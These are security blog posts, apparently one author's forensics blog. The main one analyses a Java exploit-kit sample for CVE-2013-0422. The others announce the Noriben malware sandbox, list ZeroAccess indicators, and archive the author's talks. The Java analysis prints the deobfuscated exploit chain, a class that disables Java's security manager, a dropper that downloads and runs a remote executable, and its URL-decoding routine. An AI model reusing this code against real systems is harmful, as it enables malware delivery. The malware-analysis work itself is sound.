This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.

Java IDX Files


In my many investigations, I've always relied upon the Java IDX files to backup my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, it doesn't mean that the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide us this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable with a basic text editor. Nearly all of my analysis is from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I would recommend Corey Harrell's excellent blog post: "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it notes when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser


At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit that parsed the IDX for indicators to output into a forensic timeline file at: Java Forensics using TLN Timelines. However, none delved into the binary analysis. Facing a new lifestyle change, and a drastic home move, I found myself with a lot of extra time on my hands for January/February so I decided to sit down and unravel this file. I made my mark by writing my initial IDX file parser, which only carved the known text-based data, and placed it up on Github to judge interest. At the time I wrote my parser, there were no other parsers on the market.




On a side note, I had hoped for this to be a personal challenge for me to unwind on while moving. Upon posting my initial program I packed away my PC and began moving to my new home. Two weeks later, after digging out and setting up, I found that the file was used as a catalyst for some awesome analysis. I applaud the great effort and documentation made byMark Woan and Joachim Metz.

In the weeks since the initial release I added numerous features and learned more about the structure. I learned that the file is composed of five distinct "sections", as named by Java:
  • Section 1 - Basic metadata on the status of the download. Was it completed successfully? What time was it completed at? How big is the IDX file?
  • Section 2 - Download data. This is the "text" section of the file and contains numerous length-prefixed strings situated in Field:Value pairs
  • Section 3 - Compressed copy of the JAR file's MANIFEST document
  • Section 4 - Code Signer information, in Java Serialization form
  • Section 5 - Additional data (Haven't found a file yet with this)
It's somewhat difficult to measure the forensic value of the data recovered from sections 3 and 4. The Manifest does give information on what version of Java the applet was compiled with, and for, but is just a duplicate if the JAR is still present on the infected system. Section 4 data typically provided scant details, sometimes just the character "0" or just null bytes, on Java malware I've analyzed. Instead of attempting interpretation on this data, I've just displayed it to the screen for our posterity to unravel.

When put into use on the sample we're analyzing, here are the results shown from my IDX Parser.

E:\Development\Java_IDX_Parser>idx_parser.py e:\malware\java_XXX\1c20de82-1678cc50.idx
Java IDX Parser -- version 1.3 -- by @bbaskin
IDX file: e:\malware\java_XXX\1c20de82-1678cc50.idx (IDX File Version 6.05)

[*] Section 2 (Download History) found:
URL: http://80d3c146d3.gshjsewsf.su:82/forum/dare.php?hsh=6&key=b30a14e1c597bd7215d593d3f03bd1ab
IP: 50.7.219.70
<null>: HTTP/1.1 200 OK
content-length: 7162
last-modified: Mon, 26 Jul 2001 05:00:00 GMT
content-type: application/x-java-archive
date: Sun, 13 Jan 2013 16:22:01 GMT
server: nginx/1.0.15
deploy-request-content-type: application/x-java-archive


[*] Section 3 (Jar Manifest) found:
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.8.3
X-COMMENT: Main-Class will be added automatically by build
Class-Path:
Created-By: 1.7.0_07-b11 (Oracle Corporation)


[*] Section 4 (Code Signer) found:
[*] Found: Data block.  Length: 4
Data:                   Hex: 00000000
[*] Found: Data block.  Length: 3
Data: 0                 Hex: 300d0a
Analysis of the infected file system showed activity to a completely different web site, and then a sudden infection. By timelining the events, I found the missing download information from the Java malware in the IDX file, from a domain not found elsewhere on the system.
There are a number of Java IDX parsers out there, which emerged quickly after I first published mine. Many provide good starting ground for getting obvious artifacts from the file, but I do recommend trying them all to see which works best for you.


Java Malware Analysis


With the relevant Java malware file identified, I began the analysis of the file. Typically, many examiners use a free decompiler like JD-GUI, which is a pretty useful tool for the cost. However, I've found in many cases that JD-GUI cannot appropriately decompile most of the file and ends up disassembling most of it. This means that the analysis isn't done on clean Java code, but instead on Java op-codes. This is certainly possible, and I gave a presentation to the Northern Virginia Hackers group this last year on how to do that, but it's a lot of effort and tiresome. Instead, through a thorough analysis of the current tools available, I've switched to AndroChef for all of my analysis. It still misses some, but decompiles mode code that other tools cannot.

Before going in, VirusTotal reports that this file flagged 2/46 engines for CVE-2013-0422. That gives us a clue of what exploit code to search for.

Using AndroChef on the malware file I was able to retrieve the Java code, which was contained across five separate Class files. These Class files alone are compiled modules, but data can traverse across them, requiring an examiner to analyze all of them simultaneously. For me, the easiest method is to copy and paste them all into one text document, to edit with Notepad++. This allows me to sweep-highlight a variable and quickly find every other location where that variable is in use. After a cursory analysis, I try to determine, at a high level, the purpose of each class:
  • Allaon.class - Contains all of the strings used in the malware
  • Lizixk - Contains the dropper code
  • Morny - Contains the text decryption routines
  • Rvre - Contains an embedded Java class
  • Zend - Contains the main code
The JAR also contained the standard META-INF/MANIFEST file, which matched the results shown from my IDX parser.

If you don't want to decode these files yourself, I have them available here for download.

The text within Allaon.class is obfuscated by including the text ""Miria_)d" throughout each string, as shown below:

   public static String Gege = "fiesta".replace("Miria_)d", "");
   public static String Gigos = "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader".replace("Miria_)d", "");
   public static String Momoe = "f" + "ilMiria_)d///".replace("Miria_)d", "e:");
   public static String BRni = "j" + "avMiria_)da.io.tmMiria_)dpdiMiria_)dr".replace("Miria_)d", "");
   public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");
   public static String Contex = "sun.orMiria_)dg.moziMiria_)dlla.javascMiria_)dript.inMiria_)dternal.ConMiria_)dtext".replace("Miria_)d", "");
   public static String ClsLoad = "sun.orMiria_)dg.mozMiria_)dilla.javasMiria_)dcript.inteMiria_)drnal.GeneraMiria_)dtedClaMiria_)dssLoader".replace("Miria_)d", "");
   public static String hack3 = "SophosHack";
   public static String Fcons = "fiMiria_)dndConstrMiria_)ductor".replace("Miria_)d", "");
   public static String Fvirt = "fiMiria_)dndVirtMiria_)dual".replace("Miria_)d", "");
   public static String hack2 = "SophosHack";
   public static String Crtcls = "creaMiria_)dteClasMiria_)dsLMiria_)doader".replace("Miria_)d", "");
   public static String DEfc = "defiMiria_)dneClaMiria_)dss".replace("Miria_)d", "");
By performing a simple find/replace, removing excess code, and globally giving descriptive variable names, the following results are then shown:


   public static String FiestaTag = "fiesta"
   public static String InvokeAnonClassLoader = "sun.invoke.anon.AnonymousClassLoader"
   public static String FileURI = "file:///"
   public static String TempDir = "java.io.tmpdir"
   public static String s_hehda_exe = "hehda.exe"
   public static String MozillaJSContext = "sun.org.mozilla.javascript.internal.Context"
   public static String MozillaJSClassLoader = "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
   public static String hack3 = "SophosHack";
   public static String s_findConstructor = "findConstructor"
   public static String s_findVirtual = "findVirtual"
   public static String hack2 = "SophosHack";
   public static String s_createClassLoader = "createClassLoader"
   public static String s_defineClass = "defineClass"
This provides a much better clue as to what is going on, especially as the author was a bit constructive in his variable naming and didn't randomize them upon deployment. I can then highlight each variable and find where else in the code that string is being used. I will then continue to find any such obfuscation throughout the code and remove it bits at a time, condensing the code back to what it was originally written as.
By following the logic, and renaming variables (globally) when needed, we get a main code function that boils down to:

   public void init() {
      try {
         Rvre.sfgkytoi = this.getParameter("fiesta");
         byte[] Embedded_Java_Class = Rvre.Hex2Bin(Embedded_Java_Class_hex);

JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", (MBeanServer)null, (MBeanServerDelegate)null);
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
Object a = null;
Class localClass1 = localMBeanInstantiator.findClass(Allaon.Contex, (ClassLoader)a);
Class localClass2 = localMBeanInstantiator.findClass(Allaon.ClsLoad, (ClassLoader)a);
Lookup lolluk = MethodHandles.publicLookup();
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{MethodType.class});
MethodHandle localMethodHandle1 = lolluk.findVirtual(Lookup.class, Allaon.Fcons, localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[]{lolluk, localClass1, localMethodType2});
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType ldmet3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{String.class, MethodType.class});
MethodHandle localMethodHandle3 = lolluk.findVirtual(Lookup.class, "findVirtual", ldmet3);
MethodType ldmet4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass1, "createClassLoader", ldmet4});
Object lObj2 = localMethodHandle4.invokeWithArguments(new Object[]{localObject1, null});
MethodType ldmet5 = MethodType.methodType(Class.class, String.class, new Class[]{byte[].class});
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass2, "defineClass", ldmet5});

         
         Class lca3 = (Class)localMethodHandle5.invokeWithArguments(new Object[]{lObj2, null, Embedded_Java_Class});
         lca3.newInstance();
         Lizixk.DropFile_Exec();
      } catch (Throwable var22) {
         ;
      }
   }
Much of this is straight forward. However, there is a very large block of "MethodType" and "MethodHandle" calls that are a result of the exploit, CVE-2013-0422. More on this exploit is found on Microsoft's Technet site.  The actual runtime magic appears as a single function call to the Lizixk class, which contains a function to retrieve an executable, decode it, drop it to %Temp%, and run it.  But how can such malicious logic work? A view at the top of this same function shows us the actual exploit that makes it happen. This function contains a long, obfuscated string value that has the phrase "mMoedl" throughout it, similar to the encoding used by the strings in Allaon. Upon removing this excess text, we can clearly see the first eight bytes as "CAFEBABE":


public static String Ciasio = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017"
This is the magic value, in hex, for compiled Java code. That tells us what we're looking at and that it needs to be converted to hex and saved to a file. Doing so produces another file that we can decompile with AndroChef, producing the following code:


import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
   public B() {
      try {
         AccessController.doPrivileged(this);
      } catch (Exception var2) {
         ;
      }
   }
   public Object run() {
      System.setSecurityManager((SecurityManager)null);
      return new Object();
   }
}
Wow! Such simple code, but you can see a few items that are glaring. First off, this file was flagged by VirusTotal as 1/46 for Java/Dldr.Pesur.AN. This code really just changes the local security privileges of the parent code, giving it the ability to drop and execute the second-stage malware.
With everything analyzed, we stopped at the function call from Class Lizixk to drop and malware. Now that the exploit was launched, as privileges were escalated, this dropper routine is ran:


public class Lizixk {
   public static String TempDir = getProperty("java.io.tmpdir");
   static InputStream filehandle;
   public static void DropFile_Exec() throws FileNotFoundException, Exception {
      if(TempDir.charAt(TempDir.length() - 1) != "\\") {
         TempDir = TempDir + "\\";
      }
      String Hehda_exe = TempDir + "hehda.exe";
      FileOutputStream output_filehandle = new FileOutputStream(Hehda_exe);
      DownloadEXE();
      int data_size;
      for(byte[] rayys = new byte[512]; (data_size = filehandle.read(rayys)) > 0; rayys = new byte[512]) {
         output_filehandle.write(rayys, 0, data_size);
      }
      output_filehandle.close();
      filehandle.close();
      Runtime.getRuntime().exec(Hehda_exe);
   }
   public static void DownloadEXE() throws IOException {
      URL fweret = new URL(Morny.data_decode(fiesta));
      fweret.openConnection();
      filehandle = fweret.openStream();
   }
}
There are two routines in play here, renamed by me: DropFile_Exec() and DownloadEXE(). The first is called by Class Zend and is responsible for determining the Temporary folder (%Temp%) and creating a file named "hehda.exe". It then calls DownloadEXE(). This latter routine retrieves the embedded HTML data for the parameter "fiesta", decodes it with a custom routine to retrieve a URL, then downloads that file to "hehda.exe".

After this, the file is run and the second-stage malware begins. This is standard operating procedure, as the second-stage typically belongs to the operator who purchased the exploit kit and wants their malware installed. They just require the use of the first-stage (Black Hole) to get it running on the system.


Custom Data Encoding


I have a deep love for custom encoding and encryption routines, so even without the raw data, I analyzed the encoding for the URL, found in Class Morny:

   public static String data_decode(String web_data) {
      int byte_pos = 0;
      web_data = (new StringBuffer(web_data)).reverse().toString();
      String decoded_data = "";
      web_data = web_data.replace("a-nytios", "");
      for(int i = 0; i < web_data.length(); ++i) {
         ++byte_pos;
         if(byte_pos == 3) {
            decoded_data = decoded_data + web_data.charAt(i);
            byte_pos = 0;
         }
      }
      return decoded_data;
   }
There's a lot of little routines going on here. The encoded data is retrieved from the web site HTML, then put into reverse order. It removes the text instances of "a-nytios" from the data, just like how the Java did with its embedded data. It then retrieves every third byte of the data, discarding the rest. For example:



Encoded: z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR
Reversed: Rgha-nytios4HtrRtQEa-nytiospVY:uM/8p/dPwSNwa-nytiosqFwSZ.TPbyzaJa-nytiostdKcs7iiNctE9ery.EecI6otuma-nytios4H/Ije7RvxTishlxp.Feea7a-nytiosxmZe1z
Phrase-removedRgh4HtrRtQEpVY:uM/8p/dPwSNwqFwSZ.TPbyzaJtdKcs7iiNctE9ery.EecI6otum4H/Ije7RvxTishlxp.Feea7xmZe1z
Every third byte: http://www.badsite.com/evil.exe


One reason I call this out is because there's little reporting on the routine. It's common across multiple variants of BlackHole/Redkit/fiesta/etc. You understand it better by reading through the code (and recreating it in Python/Perl) than guessing your way through it (see "llobapop" ;))

Second-Stage Malware Analysis


The end result of this Java malware is to place a single executable onto your system and run it. The malware doesn't even know where that executable is to come from, it relies upon an external source ("fiesta" parameter) to tell it where to download it from. This is how we separate the various stages of an infection. The Java first-stage is the Trojan horse to breach the walls, while hehda.exe is the Greek army hidden within.
Through the infection, we found that the second-stage malware was a variant of the ZeroAccess Rootkit, a pretty nasty piece of work. However, our time has grown long on this post so I will leave analysis of that file for the next one. We will reconvene to discuss ZeroAccess, how it entrenches itself onto the system, how IDA Pro likes to puke on it, and how Windows undocumented API calls give it so much power over your computer.

Noriben - Your Personal, Portable Malware Sandbox

$
0
0

Announcing Noriben


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben is an ideal solution for many unusual malware instances, such as those that would not run from within a standard sandbox environment. These files perhaps required command line arguments, or had VMware/OS detection that had to be actively debugged, or extremely long sleep cycles. These issues go away with Noriben. Simply run Noriben, then run your malware in a way that will make it work. If there is active protection, run it within OllyDbg/Immunity while Noriben is running and bypass any anti-analysis checks. If it has activity that changes over days, simply kick off Noriben and the malware for a long weekend and process your results when you return to work.

Noriben only requires Sysinternals procmon.exe. You may optionally first tailor Procmon to your particular VM, a step that is unique to each individual person and their environment, in order to filter out the noise of benign activity from logs. Alternatively, the filtering within Procmon can be kept sparse and you could instead place numerous filters from within Noriben to filter out the noise. (My personal preference is to perform moderate filtering from within Procmon and the rest from Noriben, which allows me to quickly remove filters for specific malware that likes to mimic benign services.) If you create Procmon filters, simply save the file as ProcmonConfiguration.pmc and save it in the same folder as Noriben.py

Simply run Noriben and wait for it to setup. Once prompted, run your malware in another window. When the malware has reached a point of activity necessary for analysis, stop Noriben by pressing Ctrl-C. Noriben will then stop the logging, gather all of the data, and process a report for you. It then generates three files, all timestamped: a Procmon PML database, a text CSV document, and a text TXT file. The PML and CSV files constitute the main source of activity, with the TXT being the final report made after applying filters. Found too many false positives in your report? Simply delete the TXT file, add filters to Noriben.py directly, and rerun it with the "-r <filename>.csv" option to re-run analysis from the CSV.

Noriben - Origins


After many years in the Information Security industry, and training forensic investigators from every walk of life, I tend to hear the same complaints from most analysts. There is simply too much work to perform with not enough of a budget to purchase adequate tools. This is a growing concern for those in the malware analysis field, where the amount of malicious files comes in at a pace faster than most can keep up with.

To counter this problem, many organizations have found themselves putting a greater weight on automated tools. The industry targeting this particular segment has exploded in the past two years, with multiple large companies coming out with a large number of tools to help strained teams, but at large financial costs.

As a resourceful analyst of a small team, usually called to help out in surge support for others, I've had to find ways to work smarter with the tools I have. While setting up a Cuckoo sandbox server is a free and preferred method for quick analysis, I needed something more nimble and portable. This issue came up when I assisted on a response and was given a laptop upon arrival, one that lacked most basic malware tools. Working alongside a team of junior analysts, we had a large mountain of files to analyze, with no ready access to the Internet to analyze files quickly. The answer came with using simple tools already on the network, used by the system administrators, namely the Sysinternals Procmon. Procmon is already in the arsenal of most malware analysts as a way to monitor system activity during dynamic analysis. By using native functionality within Procmon, a comma delimited file (CSV) file can be generated, which was then analyzed through specifically tailored grep searches. That effort turned into a way of automating the process to be used by dozens of people. After months of personal usage and testing, then end result was Noriben.

Noriben in Action


In my last blog post, I showed one of my recent tools for parsing Java IDX files, a forensic byproduct of Java-based malware infections. In that post we talked about the first-stage malware attack which was used solely to drop a file named hehda.exe to the user's Temporary folder. What was that executable and what does it do? Let's turn to Noriben:


Place your Noriben files (Noriben.py, procmon.exe, and optionally ProcmonConfiguration.pmc) into any standard Windows virtual machine. Then copy your malware to the VM.
Run Noriben and you will receive the following text:




After awhile I see the original malware file, hehda.exe, disappear from my desktop. I wait about a minute and then press Ctrl-C to stop the scan. The following text is then displayed:



Notepad then automatically opens the resulting text report shows a lot of data, seen below at the following link (because the output is so large):

Original Report

Now, this could be better. So, I adjust my filters by adding in the items that don't interest me. I do this on the fly with this instance of Noriben.py within the VM, knowing that the changes are particular to this VM and that the new filters will be erased when I revert my snapshot. I then rescan my file by using "Noriben.py -r", as shown below:



The resulting report is much easier to process:

Filtered Report

From this, we can see a few items of high notability. The processes show Hehda.exe being executed, and then spawning cmd.exe:

[CreateProcess] Explorer.EXE:1432 > "C:\Documents and Settings\Administrator\Desktop\hehda.exe" [Child PID: 2520]
[CreateProcess] hehda.exe:2520 > "C:\WINDOWS\system32\cmd.exe" [Child PID: 3444]

By following cmd.exe's PID, we can see it is later responsible for deleting hehda.exe.
Hehda.exe drops a few very interesting files, including:

[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n  [MD5: cfaddbb43ba973f8d15d7d2e50c63476]
[CreateFile] hehda.exe:2520 > C:\RECYCLER\S-1-5-18\$fab110457830839344b58457ddd1f357\n [MD5: cfaddbb43ba973f8d15d7d2e50c63476]

Right away, a Google search on this MD5 value returns many interesting results that tell us that the file was virus scanned as ZeroAccess. The filenames themselves are also indicative of ZeroAccess.

How did this file gain persistence on the victim machine? Now that we see the files, we can peruse the registry values and see the following items:

[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[CreateKey] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel  =  Both
[SetValue] hehda.exe:2520 > HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default)  =  C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.

And what other damage did it do? Well, it looks like it took out a few notable services, including those for the Windows Firewall and Windows Security Center:

[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\SharedAccess\Start  =  4
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\DeleteFlag  =  1
[SetValue] services.exe:680 > HKLM\System\CurrentControlSet\Services\wscsvc\Start  =  4

That is one nasty piece of work. But, it gets better when we get down to the network traffic:

[UDP] hehda.exe:2520 > google-public-dns-a.google.com:53
[UDP] google-public-dns-a.google.com:53 > hehda.exe:2520
[HTTP] hehda.exe:2520 > 50.22.196.70-static.reverse.softlayer.com:80
[TCP] 50.22.196.70-static.reverse.softlayer.com:80 > hehda.exe:2520
[UDP] hehda.exe:2520 > 83.133.123.20:53
[UDP] svchost.exe:1032 > 239.255.255.250:1900
[UDP] services.exe:680 > 206.254.253.254:16471
[UDP] services.exe:680 > 190.254.253.254:16471
[UDP] services.exe:680 > 182.254.253.254:16471
[UDP] services.exe:680 > 180.254.253.254:16471
[UDP] services.exe:680 > 135.254.253.254:16471
[UDP] services.exe:680 > 134.254.253.254:16471
[UDP] services.exe:680 > 117.254.253.254:16471
[UDP] services.exe:680 > 115.254.253.254:16471
[UDP] services.exe:680 > 92.254.253.254:16471
[UDP] services.exe:680 > 88.254.253.254.dynamic.ttnet.com.tr:16471
[UDP] services.exe:680 > 254.253.254.87.dynamic.monaco.mc:16471


The large list of IP addresses to UDP port 16471 are another big indicator for ZeroAccess. Upon doing open research, you'll find that the dropped file "@" is a list of IP addresses used to bootstrap the malware onto the botnet network. Additionally we see a request to "50.22.196.70-static.reverse.softlayer.com", the known domain for the MaxMind Geolocational service API, giving the botnet owners a sense of where in the world your computer lies.

Conclusions / Post Analysis Mitigation


The goal of Noriben is to provide very quick and simple answers to your questions, either to a more in-depth analysis of an infected system, a better understanding of a malware's capabilities without static analysis, or to quickly craft network filters to look for (and block) other infections. What files were created? What MD5s should I scan for? What network hosts and ports are being used? The pure text report allows you to quickly see data and copy/paste it to a relevant solution.

Noriben is not a turn-key solution. While the built-in filters will remove most innocuous items, the user will likely need to adjust and add new filters to remove additional benign entries. It's highly recommended to run Noriben in your VM and run benign applications to modify the built-in filters to meet your particular operating system.  Editing is extremely easy, just edit Noriben.py with any text editor and add new items to the respective black list.

Noriben is hosted on GitHub

P.S. Why call it Noriben? Noriben (海苔弁) is a very simple Japanese lunch box. Noriben are plentiful in shops, provide your basic nourishment, and are a staple meal for a struggling family. It felt only appropriate to analogize it to Noriben.py, a very simple sand box that provides basic indicators, can directly feed your security solutions, and fits easily within the budget of any organization.

P.P.S. If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.
1 May 13: Rewritten to be forward compatible to Python 3.X. Works in both versions of Python now.
30 Apr 13: Regular Expression support implemented and working.
17 Apr 13: Major bug fixes in filters. Now dramatically reduces false positives.
16 Sep 13: Version 1.4 now lets you specify the malware on the cmdline and specify a timeout period to be more sandbox-like. It also has the feature of generalizing path to their relative environment variable. More on that here.

Noriben version 1.1 Released

$
0
0
I've made available the latest version of Noriben with some much-needed updates.

The greatest update is a series of added filters that dramatically help to reduce false positive items in the output. This was missing from the first release due to an oversight on my part, and an unknown usability feature in Procmon. I use my own personal Procmon filters for malware analysis, which are not provided for users to download. The mistake was that I was under the assumption that removing this filter file would prevent Procmon from using them and would provide me the output that everyone else would see. That was a wrong assumption; Procmon stores a backup in the registry.

After seeing the output produced when @TekDefense ran Noriben, I quickly realized the sheer amount of items that should not be in the report, and rushed to fix this.

While updating the filters, I applied a few new improvements under the hood in how filters were applied. Primarily, filters now support regular expressions, though I have not implemented any at this point. Additionally, filters can now include environment variables. So, instead of hard-coding "C:\Users\Brian\AppData\...", which would change on every single machine, a filter can read "%UserProfile%\AppData\...". This lends to greater portability of the script, allowing it to use the same filter set on any machine with no changes.

The new version of Noriben, version 1.1, is available on GitHub here.

If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.


Update (30 Apr 13): I made a gross failure in testing the Regular Expression feature in version 1.1. In short, it didn't work. That's been rectified, and it's working perfectly. I also added some rules on how to create new rules, to meet the requirements of the regular expression parser.

Ghetto Forensics!

$
0
0
While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I perform more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site for itself, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate in. For every security team operating under a virtual unlimited budget, there are a hundred that are cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum,  a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration where a $10,000 tool is being pitched that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but ideas such as "What if we just ran `strings` on the entire hard drive and try each as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught others. While others adopted the mentality of posting questions to vendors and waiting for a response, we've learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach how to investigate a fully-fledged network intrusion on their zero-dollar budgets. We used Sleuthkit, and Autopsy, and OpenOffice. We created custom timelines and used free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running in circles around their co-workers who relied upon commercial, GUI applications. Their task became one of not finding which button to click on, but what data do I need and how do I extract it.

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Presentation Archive

$
0
0

Below are a series of presentations I've given over the years, though not a fully inclusive list. Many are too sensitive (FOUO/LES/S/TS/SAP/EIEIO) to store, and others have been lost to digital decay. But, the remainder have been recovered and digitally remastered for your enjoyment.

Walking the Green Mile: How to Get Fired After a Security Incident:

Abstract: Security incidents targeting corporations are occurring on a daily basis. While we may hear about the large cases in the news, network and security administrators from smaller organization quake in fear of losing their jobs after a successful attack of their network. Simple bad decisions and stupid mistakes in responding to a data breach or network intrusion are a great way to find yourself new employment. In this talk I'll show you in twelve easy steps how to do so after, or even during, a security incident in your company.
Notable Venues: Derbycon 1.0, Defcon Skytalks, BSides Las Vegas


Below is a video feed of the talk given at the first ever Derbycon. It was an early morning slot, and I was somehow blissfully unaware that I was being recorded, which may be why I feel it was the best recording of the talk.



Intelligence Gathering Over Twitter:

This was a basic-level presentation geared for a law enforcement audience. It taught the basics of how to use Twitter but also delved into specialized tools to collect and analyze large amounts of data, to help infer relationships and associations. This slide deck is slightly redacted, as much of the good stuff was given orally in the presentation.
Notable Venues: DoD Cyber Crime Conference


Information Gathering Over Twitter from Brian Baskin

Malware Analysis: Java Bytecode

Abstract: This was a short talk given to NoVA Hackers soon after working through a Zeus-related incident response. The Javascript used to drop Zeus on the box had a few layers of obfuscation that I had not seen discussed publicly on the Internet. This was was originally given unrecorded and only published a year later.



P2P Forensics: 

Abstract: Years ago I began working on an in-depth protocol analysis talk about BitTorrent so that traffic could be monitored. This grew into a BitTorrent forensics talk which grew into an overall P2P Forensics talk. At one point, it was a large two-hour presentation that I had to gently trim down to an hour. Given at multiple venues, each was modified to meet that particular audience (administrators, criminal prosecutors, military).
Notable Venues: GFIRST, DoD Cyber Crime Conference, DojoCon, Virginia State Police Cyber Workshop, USAF ISR Information Security Conference, USDoJ CCIPS Briefing, AFOSI Computer Crime Workshop



The only video recording of the talk, recorded at DojoCon 2010, for a technical audience.

Brian Baskin, @bbaskin P2P Forensics from Adrian Crenshaw on Vimeo.


Casual Cyber Crime:

